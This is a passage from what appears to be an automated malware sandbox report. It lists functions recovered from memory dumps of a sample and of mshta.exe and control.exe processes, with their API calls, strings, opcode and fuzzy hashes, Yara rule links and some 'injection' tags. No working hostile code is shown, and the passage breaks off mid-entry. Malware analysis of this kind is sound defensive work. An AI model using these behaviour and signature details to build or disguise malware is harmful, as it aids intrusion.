                                                                                                                                        • Opcode ID: 341b90bdd36ad07504034f5ae5e727034acf086a366c552d6f0e3daa6b82e08b
                                                                                                                                        • Instruction ID: 7660760dabd7e8c96a665a3e04b30b7990a8be242a0f4cc4a7a10d7cbabf966d
                                                                                                                                        • Opcode Fuzzy Hash: 341b90bdd36ad07504034f5ae5e727034acf086a366c552d6f0e3daa6b82e08b
                                                                                                                                        • Instruction Fuzzy Hash: E52192726007009BD7119B29DC40B27B7E2FF84715F60892DE999962A2EF79EC05CB1D
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00443912, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SystemTimewsprintf
                                                                                                                                        • String ID: %02u:%02u:%02u
                                                                                                                                        • API String ID: 425189169-982595855
                                                                                                                                        • Opcode ID: 2cc3bdcb73fdf8fced6903a6f883d9a2494d15d776b97acc02ab1c24e99a0c21
                                                                                                                                        • Instruction ID: dc3842cbff35ad168f56cc62c7446e3eef7fec04c41eeb3bcfc785ba98594ff1
                                                                                                                                        • Opcode Fuzzy Hash: 2cc3bdcb73fdf8fced6903a6f883d9a2494d15d776b97acc02ab1c24e99a0c21
                                                                                                                                        • Instruction Fuzzy Hash: 79211DB5900214AFDB10DF96DC59EAB77FCFB8C701B00446AF911DB252E6B8A801CB35
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00457655, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00450CB4: lstrlenW.KERNEL32(?,00000000,00000000,74B05520,?,?,004424EC,?), ref: 00450CC0
                                                                                                                                          • Part of subcall function 00450CB4: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,004424EC,?), ref: 00450CE8
                                                                                                                                          • Part of subcall function 00450CB4: memset.NTDLL ref: 00450CFA
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004576D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Closelstrlenmemcpymemset
                                                                                                                                        • String ID: "nF$System
                                                                                                                                        • API String ID: 958803494-2543878742
                                                                                                                                        • Opcode ID: 21333f18483d888011335ef1b996376e892aee24ee3a28bc238bfc1d299a8aea
                                                                                                                                        • Instruction ID: 46d0ad2fdb9ce0300434da698fa03011a514b641fec27066e152b5734d8356d2
                                                                                                                                        • Opcode Fuzzy Hash: 21333f18483d888011335ef1b996376e892aee24ee3a28bc238bfc1d299a8aea
                                                                                                                                        • Instruction Fuzzy Hash: 5D118675A00208BBEB11DBA5DC89FAF77FCEB00705F100066F505D7152E774E9088768
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004464D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00446501
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00446534
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                        • String ID: |cF
                                                                                                                                        • API String ID: 2488874121-1942328551
                                                                                                                                        • Opcode ID: d3a72b01a041041ec5aae915806c7fc75b6247d0dc2249bc2619dafcabb5b09c
                                                                                                                                        • Instruction ID: b001dd5464542c3b29dc1eaa1c6d5288bf0bde1f9877bc289c9d01b64045f625
                                                                                                                                        • Opcode Fuzzy Hash: d3a72b01a041041ec5aae915806c7fc75b6247d0dc2249bc2619dafcabb5b09c
                                                                                                                                        • Instruction Fuzzy Hash: 3B012CB5A10248FFEB019F99DD84CAF7FBCEB45354F10046AF901E2210E6B19E44DB65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004509D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004509FF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,00443498,?), ref: 00450A22
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree
                                                                                                                                        • String ID: acF
                                                                                                                                        • API String ID: 2488874121-1731962052
                                                                                                                                        • Opcode ID: 218805a8452ca8a15423d6a4da65dfc36674c41d7aefcc2e75e7a81a48792bfd
                                                                                                                                        • Instruction ID: 6af612e906aff0ac6d0d7cb68b450cf87497e4f52ea23ab6704f4e5853858f42
                                                                                                                                        • Opcode Fuzzy Hash: 218805a8452ca8a15423d6a4da65dfc36674c41d7aefcc2e75e7a81a48792bfd
                                                                                                                                        • Instruction Fuzzy Hash: D20181B6A00148FFAB009BA5DC80CAF7BADEB943957110436F901D3121E6709E49DB79
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045D345, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0045D359
                                                                                                                                          • Part of subcall function 00447913: lstrlen.KERNEL32(?,00000000,00466A4C,74B05520,0045D37E,?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0044791D
                                                                                                                                          • Part of subcall function 00447913: lstrcpy.KERNEL32(00000000,?), ref: 00447941
                                                                                                                                          • Part of subcall function 00447913: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 00447948
                                                                                                                                          • Part of subcall function 00447913: lstrcat.KERNEL32(00000000,00000001), ref: 0044799F
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0045D387
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenlstrcatlstrcpylstrlen
                                                                                                                                        • String ID: LjF
                                                                                                                                        • API String ID: 1030596466-2255276606
                                                                                                                                        • Opcode ID: d16e774bad874ea30de29f4573787244e12d3d97ea10b27372858efb81c241dc
                                                                                                                                        • Instruction ID: 9392d91260b5d84d2777d8b1b154b3f2fb8f67e0886cb84f0f18345674d6a165
                                                                                                                                        • Opcode Fuzzy Hash: d16e774bad874ea30de29f4573787244e12d3d97ea10b27372858efb81c241dc
                                                                                                                                        • Instruction Fuzzy Hash: 6DF0307AD00118FFDF116B95DD05C9E7F7AEB452A0B150035FD04A2225EBB29E10EA95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004656BD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(ACD,?,?,?,00444341,?), ref: 004656C6
                                                                                                                                        • _aulldiv.NTDLL(ACD,?,00989680,00000000), ref: 004656E6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$FileSystem_aulldiv
                                                                                                                                        • String ID: ACD
                                                                                                                                        • API String ID: 2806457037-620537770
                                                                                                                                        • Opcode ID: e379b053f2265b3bdad2b4defb763c2eb9804c35510360f2caab1952b24fa5d7
                                                                                                                                        • Instruction ID: ff5da879828ef6ec5ec86af737d0569650b65dd74e0b6e7913dc433b6700cb08
                                                                                                                                        • Opcode Fuzzy Hash: e379b053f2265b3bdad2b4defb763c2eb9804c35510360f2caab1952b24fa5d7
                                                                                                                                        • Instruction Fuzzy Hash: FED05EBAA00208BBDF04EBE0DC8AE9E776CDB4420CF010559B202A2341FAB4EA048725
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00466361, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00466373
                                                                                                                                          • Part of subcall function 0046645E: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00440000), ref: 004664D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                        • String ID: 0dF$acF
                                                                                                                                        • API String ID: 123106877-3337871158
                                                                                                                                        • Opcode ID: d3ee5730b992c408e7438fba27bc6252579c05b8a318d4fd514fdac518004267
                                                                                                                                        • Instruction ID: 77b642a0db3fdf44107773217a9e9fbff4ac675e89e8ade12a25039831616fb3
                                                                                                                                        • Opcode Fuzzy Hash: d3ee5730b992c408e7438fba27bc6252579c05b8a318d4fd514fdac518004267
                                                                                                                                        • Instruction Fuzzy Hash: 4EB012C175C9417C310872015D02C36011CC8C0B21331C51FB802E4040FC4C0CA1143F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0046081C, Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 0046087A
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000010,?,?,00000000,?,00000000), ref: 004608C5
                                                                                                                                        • HeapFree.KERNEL32(00000000,000000FF,000000FF,00451154,00000000,?,004585EF,00000000,?,00000094,00000000,00000001,00000094,00000000,00000000,?), ref: 00460BAE
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00460DD0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorFreeHandleHeapLastmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2333114656-0
                                                                                                                                        • Opcode ID: c0f0e677f683898a9b8d1553e068cfb87738e4e80bc60991a990bf6d84803608
                                                                                                                                        • Instruction ID: f408ae01e3d0ae0b380b1fec274dbfeb61a2eaa22249faa18833e1ed654672e0
                                                                                                                                        • Opcode Fuzzy Hash: c0f0e677f683898a9b8d1553e068cfb87738e4e80bc60991a990bf6d84803608
                                                                                                                                        • Instruction Fuzzy Hash: C7414C31600208BBDB216EA18C42F6F3528AF80755F20462FF905611D2FB7DED52966F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00452DC4, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004511FA: lstrlen.KERNEL32(00000000,?), ref: 00451253
                                                                                                                                          • Part of subcall function 004511FA: lstrlen.KERNEL32(?,?), ref: 00451271
                                                                                                                                          • Part of subcall function 004511FA: RtlAllocateHeap.NTDLL(00000000,74B06985,?), ref: 0045129A
                                                                                                                                          • Part of subcall function 004511FA: memcpy.NTDLL(00000000,00000000,00000000), ref: 004512B1
                                                                                                                                          • Part of subcall function 004511FA: HeapFree.KERNEL32(00000000,00000000), ref: 004512C4
                                                                                                                                          • Part of subcall function 004511FA: memcpy.NTDLL(00000000,?,?), ref: 004512D3
                                                                                                                                        • GetLastError.KERNEL32 ref: 00452E63
                                                                                                                                          • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5B6
                                                                                                                                          • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5D6
                                                                                                                                          • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5E2
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00452E7F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00452E90
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00452E93
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2451549186-0
                                                                                                                                        • Opcode ID: 0c167ff5d8d1acc8ce6fb35b3478f39ed077ee13eb8459fac125db5b3d120cea
                                                                                                                                        • Instruction ID: 68f54da71d32707e2ef09746108598c7089aab439766a053074a2426b6466fd9
                                                                                                                                        • Opcode Fuzzy Hash: 0c167ff5d8d1acc8ce6fb35b3478f39ed077ee13eb8459fac125db5b3d120cea
                                                                                                                                        • Instruction Fuzzy Hash: 6B318932900108EFCF129F99CD4189EBFB5FF49311B00416BF915A2221D7B58E55DF99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00455F44, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045A977: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?), ref: 0045A99B
                                                                                                                                          • Part of subcall function 0045A977: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0045A9AD
                                                                                                                                          • Part of subcall function 0045A977: wcstombs.NTDLL ref: 0045A9BB
                                                                                                                                          • Part of subcall function 0045A977: lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045A9DF
                                                                                                                                          • Part of subcall function 0045A977: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0045A9F4
                                                                                                                                          • Part of subcall function 0045A977: mbstowcs.NTDLL ref: 0045AA01
                                                                                                                                          • Part of subcall function 0045A977: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA13
                                                                                                                                          • Part of subcall function 0045A977: HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,00455F7A,?,?,?,?,?), ref: 0045AA2D
                                                                                                                                        • GetLastError.KERNEL32 ref: 00455FE3
                                                                                                                                          • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5B6
                                                                                                                                          • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5D6
                                                                                                                                          • Part of subcall function 0044F4FC: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 0044F5E2
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00455FFF
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00456010
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00456013
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3867366388-0
                                                                                                                                        • Opcode ID: f0b3e700ceb847b927c465a8a21a843c08898c3e6863e1c9056936b50d0307ab
                                                                                                                                        • Instruction ID: de9c44983d1b4b3718f1bcec81e044c3c8b2f84953bbe7fd760671bf25c54f13
                                                                                                                                        • Opcode Fuzzy Hash: f0b3e700ceb847b927c465a8a21a843c08898c3e6863e1c9056936b50d0307ab
                                                                                                                                        • Instruction Fuzzy Hash: 36317836900108EFCF129F99CC408EEBFB5FF48321B01456AF915A2261D7758EA5DFA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004500F1, Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                        • Opcode ID: a8686173dd61a553bbca1607d9df8c4b2443ad1fc8e937cdd3fd2572bfcd19b0
                                                                                                                                        • Instruction ID: 4e90a099d55fb56f60f5ffecb49767784f2bee4215fe293a0fe2a86b918c3b19
                                                                                                                                        • Opcode Fuzzy Hash: a8686173dd61a553bbca1607d9df8c4b2443ad1fc8e937cdd3fd2572bfcd19b0
                                                                                                                                        • Instruction Fuzzy Hash: 7621CD76500909BFDB209FA2DC809677B39FF09306704011AFD4596A42D73AE8B4CBDA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045383E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(74B05520,00000008,?,00000000,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5), ref: 0045384A
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 0046628F: StrChrA.SHLWAPI(?,0000002F,00000000,74B05520,00453878,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60), ref: 0046629D
                                                                                                                                          • Part of subcall function 0046628F: StrChrA.SHLWAPI(?,0000003F,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5,00000008,?), ref: 004662A7
                                                                                                                                        • memcpy.NTDLL(00000000,74B05520,74B05520,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000), ref: 004538A8
                                                                                                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004538B8
                                                                                                                                        • lstrcpy.KERNEL32(00000000,74B05520), ref: 004538C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3767559652-0
                                                                                                                                        • Opcode ID: fd7d9bc784a57982a24b259c991cb3c95603c23b54c957930852614ca9833cbc
                                                                                                                                        • Instruction ID: ef34d5f5792f8768f3f275ac2900e80723fba94c698835b2abe68d3244445f8b
                                                                                                                                        • Opcode Fuzzy Hash: fd7d9bc784a57982a24b259c991cb3c95603c23b54c957930852614ca9833cbc
                                                                                                                                        • Instruction Fuzzy Hash: FD21D272504215BFCB116F65CC58AAB7FE8AF053C6F15446AFC049B202EA39DA08D7A5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00444F3D, Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                        • Opcode ID: 46406bc6ba4a5c6106ab340b2283113b2a524d34b55f8ae27d873ba0cb1a0ff6
                                                                                                                                        • Instruction ID: 782232096d5aa84da9a2f66b046b0ca7c147a1f04da39f1c736fb1b7b91bed5d
                                                                                                                                        • Opcode Fuzzy Hash: 46406bc6ba4a5c6106ab340b2283113b2a524d34b55f8ae27d873ba0cb1a0ff6
                                                                                                                                        • Instruction Fuzzy Hash: CC11C172500909BFE7209F92DC40A57B778FF09308B00061AFA4591981D736F9B5DBE9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00441705, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,74B481D0,77E2EEF0,00444439,00470449,?), ref: 00441711
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00441719
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 00441730
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 0044173B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 74227042-0
                                                                                                                                        • Opcode ID: 69f85f6e1582973d590fe80703df6b3649c20f4ee67ddfff8daf302f156a422c
                                                                                                                                        • Instruction ID: 11e00656ec1c7d06dc55a81e32f496be1f6fa217466ae87c1841441719ce0293
                                                                                                                                        • Opcode Fuzzy Hash: 69f85f6e1582973d590fe80703df6b3649c20f4ee67ddfff8daf302f156a422c
                                                                                                                                        • Instruction Fuzzy Hash: A4E01233505621AB8B126B64AC08C8FBBA9FF88350705492AF54093120DF75D819CB96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Analysis Process: mshta.exe PID: 5816 Parent PID: 3388 mshta.exeCOMMON

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0000022A92C90FB9, Relevance: .0, Instructions: 5COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000019.00000003.368982619.0000022A92C90000.00000010.00000001.sdmp, Offset: 0000022A92C90000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                        • Instruction ID: 7449731305f2fc08fb06f6237249f2db8b14d6ef435b223f7342364bc7a7b90f
                                                                                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                        • Instruction Fuzzy Hash: FC9002094D640666D51411D20C4935C50406388250FD44480441690544D58E03D6D153
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0000022A92C90FC1, Relevance: .0, Instructions: 5COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000019.00000003.368982619.0000022A92C90000.00000010.00000001.sdmp, Offset: 0000022A92C90000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                        • Instruction ID: 7449731305f2fc08fb06f6237249f2db8b14d6ef435b223f7342364bc7a7b90f
                                                                                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                        • Instruction Fuzzy Hash: FC9002094D640666D51411D20C4935C50406388250FD44480441690544D58E03D6D153
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Analysis Process: control.exe PID: 4672 Parent PID: 6780 control.exeCOMMON

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00FC676C, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 643COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                        • Opcode ID: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
                                                                                                                                        • Instruction ID: d6bc2c4d2378e74a265c5770f834e54c2bf23025d7fda2e14221a71acc3765ab
                                                                                                                                        • Opcode Fuzzy Hash: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
                                                                                                                                        • Instruction Fuzzy Hash: 3112723171CE0A8FDB59EF68D885BA673E1FB98311F40462DE44AC3251DF34E9459B81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FCF7EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationQueryToken$Close
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 459398573-4108050209
                                                                                                                                        • Opcode ID: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
                                                                                                                                        • Instruction ID: eeff9be7b0f43e851f656a5e8d4232c7e0c628b544bcb7165a27e57d9adaa216
                                                                                                                                        • Opcode Fuzzy Hash: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
                                                                                                                                        • Instruction Fuzzy Hash: CA311970618B488FD764EF19D8C5B9AB7E6FBD8301F40493EE58AC3250DB349A05CB42
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FCA4BC, Relevance: 4.8, APIs: 3, Instructions: 297memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocCreateFreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2341667014-0
                                                                                                                                        • Opcode ID: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                        • Instruction ID: c186d342a846be51d2d894fc6a8909298c42a476b5686daac52904d864aa1064
                                                                                                                                        • Opcode Fuzzy Hash: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
                                                                                                                                        • Instruction Fuzzy Hash: 7A91A971618B0D8FE758EF28E8857A673E5FB98314F04852DE58BC3251EF38E8469742
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FBF560, Relevance: 4.7, APIs: 3, Instructions: 197nativethreadinjectionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtSetInformationProcess.NTDLL ref: 00FBF62A
